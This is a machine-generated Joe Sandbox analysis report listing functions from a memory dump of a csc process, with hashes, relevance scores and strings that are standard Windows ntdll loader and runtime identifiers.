                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                      • API String ID: 0-2968386058
                                                      • Opcode ID: 9dfbf392f1f0ec1befebcec6af52e6022d610481cf8dce109af45aa867bfbf04
                                                      • Instruction ID: 5d0b5de4a4dff29f768db40dfc584ccf47f36f8d517e0e20cb6c380df3398809
                                                      • Opcode Fuzzy Hash: 9dfbf392f1f0ec1befebcec6af52e6022d610481cf8dce109af45aa867bfbf04
                                                      • Instruction Fuzzy Hash: DC417B72E04219ABDF19DAD4C885FEEB7B9AB04714F4040ABF901B7280D7749E448B90
                                                      Function 05424755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 05424899
                                                      • LdrpCheckRedirection, xrefs: 0542488F
                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 05424888
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 0-3154609507
                                                      • Opcode ID: a8ea29de4660bc6d1bef6921b375b5a84486a286e382fbf7e3969b2882f2cef4
                                                      • Instruction ID: 1ce9629d3dd3031fe1205d1f54dfc0cfb4a7ebe1b47d57a53b1fe66a6815eca0
                                                      • Opcode Fuzzy Hash: a8ea29de4660bc6d1bef6921b375b5a84486a286e382fbf7e3969b2882f2cef4
                                                      • Instruction Fuzzy Hash: 5841B03AA242709BCF21CE58D841AA7BBE5FF89A50B4605ABEC59D7751D730D800CB91
                                                      Function 05434144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                      • API String ID: 0-1373925480
                                                      • Opcode ID: 378852ac12efd0ccb77180ca12c1ab10eb20a900b922b0fa85613996c29d505a
                                                      • Instruction ID: 0f3334ad200c2efe0efb31394e4dc378174094140d834628df09c1928be48567
                                                      • Opcode Fuzzy Hash: 378852ac12efd0ccb77180ca12c1ab10eb20a900b922b0fa85613996c29d505a
                                                      • Instruction Fuzzy Hash: E141B031A086588BEF25DBE5C84DBEEB7B5FF49340F14049AD901AB7A1D6748901CB10
                                                      Function 0542B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • GlobalFlag, xrefs: 0542B68F
                                                      • @, xrefs: 0542B670
                                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0542B632
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                      • API String ID: 0-4192008846
                                                      • Opcode ID: 53fde13793943f18976e733cca1bfb2419ae7a485827fe477c6ed6c45eba0095
                                                      • Instruction ID: 6e95ced64dfc5a9ea98910aa897487624ccd88dae305d952e68673ddd3fe9cf0
                                                      • Opcode Fuzzy Hash: 53fde13793943f18976e733cca1bfb2419ae7a485827fe477c6ed6c45eba0095
                                                      • Instruction Fuzzy Hash: 7A314DB1A00229AFDB11EF95CC84EEFBBBDEF44744F54446AE605A7250E7749E00CBA4
                                                      Function 053D1607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • minkernel\ntdll\ldrtls.c, xrefs: 05411A51
                                                      • LdrpInitializeTls, xrefs: 05411A47
                                                      • DLL "%wZ" has TLS information at %p, xrefs: 05411A40
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                      • API String ID: 0-931879808
                                                      • Opcode ID: 01aeb86de310511f6e16462a7f7018c7926a72ac737fa70124f8c107819ecbdc
                                                      • Instruction ID: b891348cc3c158d1c7708663665640253565a63d08e167d7f9c3d729ad138359
                                                      • Opcode Fuzzy Hash: 01aeb86de310511f6e16462a7f7018c7926a72ac737fa70124f8c107819ecbdc
                                                      • Instruction Fuzzy Hash: CE31B373A10200ABEB199F58DC46FFABAB9FF90754F15015AF905A7680DBB1AD40C7A0
                                                      Function 054220DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Process initialization failed with status 0x%08lx, xrefs: 054220F3
                                                      • LdrpInitializationFailure, xrefs: 054220FA
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 05422104
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2986994758
                                                      • Opcode ID: addb0f030673c39b9d6a896c73a83b3c057c1369f9a5a3efecc36fdea86c3aaf
                                                      • Instruction ID: d7c20c392556bb3a77db453e5348e464e12f45f01782d3181294ccf37dbf54ba
                                                      • Opcode Fuzzy Hash: addb0f030673c39b9d6a896c73a83b3c057c1369f9a5a3efecc36fdea86c3aaf
                                                      • Instruction Fuzzy Hash: E4F0C879640328ABDB28EA4DDC57FEA3BA8FB41B54F50049AFA0477381D6F0A500C691
                                                      Function 0546A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `$`
                                                      • API String ID: 0-197956300
                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                      • Instruction ID: 048c3d45a7206434671e8ebed3ed5b8c713268ee30f54300d7ba86395b1b5aeb
                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                      • Instruction Fuzzy Hash: 56C1C131208741DBD724CF26C845BABBBE6BF84318F084A6EF5969B290D774D905CB53
                                                      Function 0541E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      • Opcode ID: 8848c6762aeab8786b7a21baa4c330e52151952878bb094593de14488b3254df
                                                      • Instruction ID: a78bdd748123d88ec9d7a59754df50cd47b0f16abc448eb82d5ef45efd14e566
                                                      • Opcode Fuzzy Hash: 8848c6762aeab8786b7a21baa4c330e52151952878bb094593de14488b3254df
                                                      • Instruction Fuzzy Hash: 34615C75E043189FDB15DFA8C840BEEBBB9FB48700F10406AEA59EB291DB31A951CB54
                                                      Function 053BF720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$$
                                                      • API String ID: 0-233714265
                                                      • Opcode ID: 7e86620bd2fa9133f3fad9b271b7c9b93253549203fb2f5476b913a893642750
                                                      • Instruction ID: 1c60c2c89c27735db58f24793f7a16493e15d82943a4082943d889522a67bb3b
                                                      • Opcode Fuzzy Hash: 7e86620bd2fa9133f3fad9b271b7c9b93253549203fb2f5476b913a893642750
                                                      • Instruction Fuzzy Hash: EA61F171E00749DFEB21DFA4C989BEDB7B2FF44304F105469D615ABA80DBB4A980CB80
                                                      Function 053A04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • kLsE, xrefs: 053A0540
                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 053A063D
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                      • API String ID: 0-2547482624
                                                      • Opcode ID: 21e9d5b66268434eec8ecaed8cf78e1107e8d71e121c89e075fe918a3ef95fbc
                                                      • Instruction ID: ab9ad4400bbbe62a4629fa4fea643adfa97212d36ac91376bf46ce5fc48267f5
                                                      • Opcode Fuzzy Hash: 21e9d5b66268434eec8ecaed8cf78e1107e8d71e121c89e075fe918a3ef95fbc
                                                      • Instruction Fuzzy Hash: 2C51A0726087428FC728EF65C588AA7B7E5FF84304F00483EE5EA87250E7B4E545CB92
                                                      Function 054335BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                      • API String ID: 0-118005554
                                                      • Opcode ID: 9a67040fd854b762b2a409524d2daddcb1b7712774749a9f923e3d93d6568e58
                                                      • Instruction ID: bf42462285ed6dd4bace0285e5fb58f047ed6e893a2bb64adc516e4e946e2c93
                                                      • Opcode Fuzzy Hash: 9a67040fd854b762b2a409524d2daddcb1b7712774749a9f923e3d93d6568e58
                                                      • Instruction Fuzzy Hash: A3319A3160C7419FD321DF28D849BAAB7E4EF88714F040CAAF8558B3A0EB74D905CB52
                                                      Function 053D34B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RtlpInitializeAssemblyStorageMap, xrefs: 05412A90
                                                      • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 05412A95
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                      • API String ID: 0-2653619699
                                                      • Opcode ID: 19ff85017f2ba6ea24610ea2a4ae9897d28bd01349be6e5e6d25a9aa8c86ee74
                                                      • Instruction ID: bac3fda473e894f474bb56b0159e85be9b86c55c2d1dc3b77513cbaa83ee0c96
                                                      • Opcode Fuzzy Hash: 19ff85017f2ba6ea24610ea2a4ae9897d28bd01349be6e5e6d25a9aa8c86ee74
                                                      • Instruction Fuzzy Hash: 49115072704200FBE725CA499D41FBBB2BDEB84B54F1480597901DB340D6B5CD0083B4
                                                      Function 053DA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Cleanup Group$Threadpool!
                                                      • API String ID: 2994545307-4008356553
                                                      • Opcode ID: 9fa91eb7a1ae64316250d5eb4babb7e4b00057d30de6f924a1514f939b4b59d9
                                                      • Instruction ID: 699fd76bbf11353682cea91e2bbc7e3a9e8333d66f86cf7f3f9a896301d62fe8
                                                      • Opcode Fuzzy Hash: 9fa91eb7a1ae64316250d5eb4babb7e4b00057d30de6f924a1514f939b4b59d9
                                                      • Instruction Fuzzy Hash: 6401D6B2218648AFE321DF24DE0AB22B6E8E740B15F018829B608C7180E7B4E800CB56
                                                      Function 053AC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: MUI
                                                      • API String ID: 0-1339004836
                                                      • Opcode ID: d3980f3cfb2b1fe78a8313215aa6ce28e3f9428f830c9866ca98f16a27eb5b2e
                                                      • Instruction ID: b7038ffc19f28def83e494b310e095380b7701bac85abd5119e220e9134615f2
                                                      • Opcode Fuzzy Hash: d3980f3cfb2b1fe78a8313215aa6ce28e3f9428f830c9866ca98f16a27eb5b2e
                                                      • Instruction Fuzzy Hash: 51826A76E042189FDB24CFA9C884BEDB7B6FF48310F148569E85AAB790DB709D41CB50
                                                      Function 053DF603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6b8e7bb0f3f6f795e2f8db1b49e2f32ced4b35fb5df1e02f1d30b8b91a57649d
                                                      • Instruction ID: 9403dd29b2cbf51180800fea9e192dbd123a7cf90282c3b9fc99f76f080fc920
                                                      • Opcode Fuzzy Hash: 6b8e7bb0f3f6f795e2f8db1b49e2f32ced4b35fb5df1e02f1d30b8b91a57649d
                                                      • Instruction Fuzzy Hash: 9F416BB5D00288AFCB24CFA9E481AEEFBF4FB48700F50412EE45AA7611DB719901CF60
                                                      Function 053DA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GlobalTags
                                                      • API String ID: 0-1106856819
                                                      • Opcode ID: 54d01ca91e2fc1cad89c07a0ade4d32ceba8d93987a54eec587d56fe3b900d43
                                                      • Instruction ID: 05a5b7e8411e6e3fef3bc2c20e2012ad34679dfcea0a781d55a9c357650af6d7
                                                      • Opcode Fuzzy Hash: 54d01ca91e2fc1cad89c07a0ade4d32ceba8d93987a54eec587d56fe3b900d43
                                                      • Instruction Fuzzy Hash: 6D718E75E0521ACFDF28CF98D580AEEBBB2BF48700F15816EE816A7740DB319801CB64
                                                      Function 053A973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                      • Instruction ID: 5bcd7dbb315f6d61c8105d0467a0c7220c9e47571f6cad0cfde7447eb58e113c
                                                      • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                      • Instruction Fuzzy Hash: 6A612D76D05219ABDF12DF95C848BEEBBB9FF44710F24416AE811B7290D7B49901CB50
                                                      Function 0542F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                      • Instruction ID: 7549fae063e5044a6ee31a0e97495c6b934f34e806b5b50c81ca4479567a9f84
                                                      • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                      • Instruction Fuzzy Hash: D451BD72608725BFE7219F54C845FABB7F8FB84750F80092AB64097690E7B0ED08CB91
                                                      Function 053BE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: EXT-
                                                      • API String ID: 0-1948896318
                                                      • Opcode ID: 8e81655c466ba91d3073fd4dbb096f2397138e5b2dfbca3bace6c1617b5520a9
                                                      • Instruction ID: b39dbf8e18c6b705afd96423f119e4d4ebbcddae229f790c8a8f0d21af6915b3
                                                      • Opcode Fuzzy Hash: 8e81655c466ba91d3073fd4dbb096f2397138e5b2dfbca3bace6c1617b5520a9
                                                      • Instruction Fuzzy Hash: 0841A372608351ABE720DA79C845BEBB7ECAF88704F440A2DF685D7580E7B4D904D793
                                                      Function 0541C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryHash
                                                      • API String ID: 0-2202222882
                                                      • Opcode ID: 4edcca93bcb8c98d69f6a2e21b842cfd834d53546710ce6bb21a61dbbaf1e9b9
                                                      • Instruction ID: d8021e71ccfa79e2393f275320b5be9d458f722c91acc909ddeea11d0d230760
                                                      • Opcode Fuzzy Hash: 4edcca93bcb8c98d69f6a2e21b842cfd834d53546710ce6bb21a61dbbaf1e9b9
                                                      • Instruction Fuzzy Hash: 654115B2D4062DAADF21DA50CCC5FDEB77CAB45714F0045E6EA08AB140DB709E49CFA8
                                                      Function 054297A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: verifier.dll
                                                      • API String ID: 0-3265496382
                                                      • Opcode ID: 4228018cf0c5b665be206625aa993da1d8b5bbbd9b411d84f4dcbc3d3a9239f3
                                                      • Instruction ID: 5c4d5ef572dfa32772235160eee7ce812b9e4f0a8446fa253b916e0a2d1aa2f2
                                                      • Opcode Fuzzy Hash: 4228018cf0c5b665be206625aa993da1d8b5bbbd9b411d84f4dcbc3d3a9239f3
                                                      • Instruction Fuzzy Hash: 49318371B202219FDB299E289851AF7B7E5FB48710FA8447AE505DF780EA718881C750
                                                      Function 0544705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: kLsE
                                                      • API String ID: 0-3058123920
                                                      • Opcode ID: e1d4b9f3af51c0402677222d4b4a70643d383887eef4aa74edfdb313bfc3b238
                                                      • Instruction ID: 5b6a81b8f6027ae9a333287681b7cdfd365ec74e59c8493f5801154d6a4f14f9
                                                      • Opcode Fuzzy Hash: e1d4b9f3af51c0402677222d4b4a70643d383887eef4aa74edfdb313bfc3b238
                                                      • Instruction Fuzzy Hash: 204148726613914AF728AB64D88BBEA3F90FB50724F15065EFC518B2C1CF740887CBA1
                                                      Function 053D7505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #
                                                      • API String ID: 0-1885708031
                                                      • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                      • Instruction ID: f03b0e9f455d607851a07460e51015e5dd2028bc8fe0ee0c9df535da48012b8b
                                                      • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                      • Instruction Fuzzy Hash: 3641AE76A00616ABCF21DF44D890BBEF7B6FF84755F00409AE942A7640DB74E941CBE2
                                                      Function 053D36EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Flst
                                                      • API String ID: 0-2374792617
                                                      • Opcode ID: 2e2e89e77a276a02668cef725e58d4fb31e7d2e7b695a84f2931dad2023d3c42
                                                      • Instruction ID: 9a42da9500b7f1ca3b2273cad80e1babdbf87944f45ea812cda9ed903c04a64e
                                                      • Opcode Fuzzy Hash: 2e2e89e77a276a02668cef725e58d4fb31e7d2e7b695a84f2931dad2023d3c42
                                                      • Instruction Fuzzy Hash: 4141DDB22097019FC354CF18D184A56FBE5FB49710F1485AEE85ACF241EBB1DC42CBA2
                                                      Function 05399730 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: L4_wL4_w
                                                      • API String ID: 0-4042522810
                                                      • Opcode ID: 27d8c3f6b86fe523650ddd26b20feeaaf093eb1a89473a6d29935026d4a3badd
                                                      • Instruction ID: 45558f4c87d8eb17da3836be9a15924ce93ccac7c04f7dc892a05ae41b2730cd
                                                      • Opcode Fuzzy Hash: 27d8c3f6b86fe523650ddd26b20feeaaf093eb1a89473a6d29935026d4a3badd
                                                      • Instruction Fuzzy Hash: 572125BBA007149FCB269F58C405B9BBBB5FB84B14F12042DA615DB740DB70EC01CB90
                                                      Function 053A5096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Actx
                                                      • API String ID: 0-89312691
                                                      • Opcode ID: 45ae314f4fb326979a683d7ed21acc424502cf0aaf9247f4a94ef3b762df79a7
                                                      • Instruction ID: d02388b9fcea2609a70d9cf3e46a36bb2bbe5fc7c32e24f4bcff64a71ef75e4d
                                                      • Opcode Fuzzy Hash: 45ae314f4fb326979a683d7ed21acc424502cf0aaf9247f4a94ef3b762df79a7
                                                      • Instruction Fuzzy Hash: A011B6337486028BDF38CE1D9854776729BFB91224F38813AE862CB791E6B5DC41C380
                                                      Function 0542106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrCreateEnclave
                                                      • API String ID: 0-3262589265
                                                      • Opcode ID: e4f5997be6f08c1d1305e504a785c9ef1b897924e50c96a80c0d7587dd33c40e
                                                      • Instruction ID: af70f71a1da72d8caa8be2ca82bc46288717f006b17529626ddd854fd626416f
                                                      • Opcode Fuzzy Hash: e4f5997be6f08c1d1305e504a785c9ef1b897924e50c96a80c0d7587dd33c40e
                                                      • Instruction Fuzzy Hash: 7A21F3B1A183549FC324DF2A8845A9BFBE8FBD5B10F404A1FB9A497250DBB09405CB92
                                                      Function 0544A118 Relevance: .6, Instructions: 591COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a6c1a077cee84c066e7ffc1e6c80e4d27146877201e87a1d7291f94d82f0b05a
                                                      • Instruction ID: e85e22ebced852fd7eca3b2adaa0121b20511c30265541c234e9ef8dbcb0dfb7
                                                      • Opcode Fuzzy Hash: a6c1a077cee84c066e7ffc1e6c80e4d27146877201e87a1d7291f94d82f0b05a
                                                      • Instruction Fuzzy Hash: 27228D742C86518BEB24CF2AC0547B7B7E3BF44204F08849BE8968B786E735D592DF61
                                                      Function 054616CC Relevance: .6, Instructions: 571COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a9bede33e5ae29ae94cd7debd01cca0fcb8fd62c0d090550344fc424b29dda6b
                                                      • Instruction ID: a3bc0ca74a093c8ee080bf8d0b7575bd1a0e2857563473d0d54e96bc91b593f5
                                                      • Opcode Fuzzy Hash: a9bede33e5ae29ae94cd7debd01cca0fcb8fd62c0d090550344fc424b29dda6b
                                                      • Instruction Fuzzy Hash: 7C229E35B042168FCB19CF59C490BFEB7B2BF88314B2495AED956DB344DB30A942CB91
                                                      Function 053A65D0 Relevance: .4, Instructions: 383COMMON
                                                      Download Yara Rule
